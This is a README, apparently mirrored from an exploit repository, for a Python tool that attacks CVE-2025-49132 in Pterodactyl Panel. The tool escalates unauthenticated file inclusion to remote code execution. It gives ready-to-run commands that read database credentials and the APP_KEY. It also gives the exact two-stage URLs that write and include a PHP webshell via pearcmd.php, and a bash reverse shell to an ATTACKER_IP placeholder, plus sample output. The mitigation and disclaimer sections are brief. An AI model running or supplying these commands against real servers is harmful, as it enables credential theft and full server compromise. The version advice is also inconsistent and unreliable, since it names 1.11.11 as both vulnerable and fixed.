Share
## https://sploitus.com/exploit?id=2E0E1726-1469-55A5-A3D1-66C2F369E70F
# CVE-2025-49132 - Pterodactyl Panel Exploit
> โ ๏ธ **Disclaimer**: This repository is created for **educational and research purposes only** as part of my security research to understand and document CVE-2025-49132. All credit for the vulnerability discovery goes to the original researcher(s).
```
___ __ __ ___ ___ ___ ___ ___ _ _ ___ _ ____ ___
/ __|\ \ / /| __|___ |_ ) / _ \|_ )| __|___ | || | / _ \| ||__ / |_ )
| (__ \ V / | _|___| / / | (_) |/ / |__ \___| |_ _| \_, /| ||_ \ / /
\___| \_/ |___| /___| \___//___||___/ |_| /_/ |_|___/ /___|
Pterodactyl Panel - Unauthenticated LFI to RCE Exploit
```
## ๐ Description
**CVE-2025-49132** is an **Unauthenticated Local File Inclusion (LFI)** vulnerability in Pterodactyl Panel that can be escalated to **Remote Code Execution (RCE)** via PHP's `pearcmd.php`.
The vulnerability exists in the `/locales/locale.json` endpoint, which fails to properly sanitize the `locale` and `namespace` parameters, allowing attackers to read arbitrary PHP configuration files and achieve code execution.
## ๐ฏ Affected Versions
| Status | Version |
|--------|---------|
| โ Vulnerable | = 1.11.11 |
## โก Features
- **LFI Mode**: Read PHP configuration files (database credentials, APP_KEY, etc.)
- **RCE Mode**: Remote code execution via `pearcmd.php` LFI2RCE technique
- **Interactive Shell**: Persistent shell for multiple command execution
- **Single Command**: One-shot command execution
- **Pretty Output**: Color-coded, formatted output for better readability
## ๐ฆ Installation
```bash
# Clone the repository
git clone https://github.com/YOUR_USERNAME/CVE-2025-49132.git
cd CVE-2025-49132
# Install dependencies
pip install requests
```
### Requirements
- Python 3.6+
- `requests` library
- `curl` (for RCE mode)
## ๐ Usage
### LFI - Read Configuration Files
```bash
# Read database configuration
python exploit.py -u http://target.com --read -p ../../config -f database
# Read application configuration (contains APP_KEY)
python exploit.py -u http://target.com --read -p ../../config -f app
# Read other configurations
python exploit.py -u http://target.com --read -p ../../config -f auth
python exploit.py -u http://target.com --read -p ../../config -f session
python exploit.py -u http://target.com --read -p ../../config -f mail
```
### RCE - Remote Code Execution
```bash
# Single command execution
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "id"
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "whoami"
# Interactive shell mode
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR
# Reverse shell
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
```
### Common PEAR Paths
| Distribution | Path |
|--------------|------|
| Debian/Ubuntu | `../../../../../../usr/share/php` |
| SUSE/OpenSUSE | `../../../../../../usr/share/php/PEAR` |
| CentOS/RHEL | `../../../../../../usr/share/pear` |
| Alpine | `../../../../../../usr/share/php8` |
## ๐ Arguments
| Argument | Description |
|----------|-------------|
| `-u, --url` | Target URL (required) |
| `-p, --path` | Path traversal for LFI or PEAR path for RCE |
| `-f, --file` | PHP file to read (without .php extension) |
| `--read` | Enable LFI read mode |
| `--rce` | Enable RCE mode |
| `--cmd` | Command to execute (single execution mode) |
| `--sdir` | Directory to write shell (default: /tmp) |
| `--sname` | Shell filename (default: shell) |
## ๐ฌ How It Works
### LFI (Local File Inclusion)
The vulnerable endpoint `/locales/locale.json` accepts `locale` and `namespace` parameters:
```
GET /locales/locale.json?locale=../../config&namespace=database
```
This allows reading any PHP file that returns an array, including Laravel configuration files.
### RCE (Remote Code Execution)
The exploit chains LFI with `pearcmd.php` to achieve RCE:
1. **Stage 1**: Use `pearcmd.php`'s `config-create` command to write a PHP webshell
```
/locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&/+/tmp/shell.php
```
2. **Stage 2**: Include the written shell via LFI
```
/locales/locale.json?locale=../../../../../../tmp&namespace=shell&c=
```
## ๐ธ Screenshots
### LFI - Reading Database Configuration
```
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
DATABASE CONFIGURATION
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
default: mysql
connections:
mysql:
driver: mysql
host: 127.0.0.1
port: 3306
database: panel
username: pterodactyl
password: SecretPassword123
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[+] Configuration extracted successfully!
```
### RCE - Command Execution
```
[*] Target: http://panel.example.com
[*] Executing command: id
[*] Writing payload to: /tmp/cmd_abc123.php
[+] Output:
----------------------------------------
uid=474(wwwrun) gid=477(www) groups=477(www)
----------------------------------------
```
## ๐ก๏ธ Mitigation
1. **Update** Pterodactyl Panel to version **1.11.11** or later
2. Implement proper input validation on `locale` and `namespace` parameters
3. Use allowlist for valid locale/namespace values
4. Restrict PHP's `register_argc_argv` directive
## โ ๏ธ Disclaimer
This tool is provided for **educational and authorized security testing purposes only**.
- Only use this tool on systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal
- The author is not responsible for any misuse or damage caused by this tool
**Use responsibly and ethically.**
## ๐ References
- [Pterodactyl Panel Official](https://pterodactyl.io/)
- [Pterodactyl Panel Github](https://github.com/pterodactyl/panel/tree/1.0-develop/config)
- [CVE-2025-49132 Details](https://nvd.nist.gov/vuln/detail/CVE-2025-49132)
- [CVE-2025-49132: Pterodactyl Panel Allows Unauthenticated Arbitrary Remote Code Execution](https://www.miggo.io/vulnerability-database/cve/CVE-2025-49132)
- [PEAR LFI to RCE Technique](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html)
- [PHP Filter Chain Generator](https://github.com/synacktiv/php_filter_chain_generator)
- [Local File Inclusion to Remote Code Execution (RCE)](https://medium.com/@lashin0x/local-file-inclusion-to-remote-code-execution-rce-bea0ec06342a)
## ๐ Changelog
- **v1.0.0** - Initial release
- LFI configuration reading
- RCE via pearcmd
- Interactive shell mode
- Pretty formatted output
---
**โญ Star this repo if you found it useful!**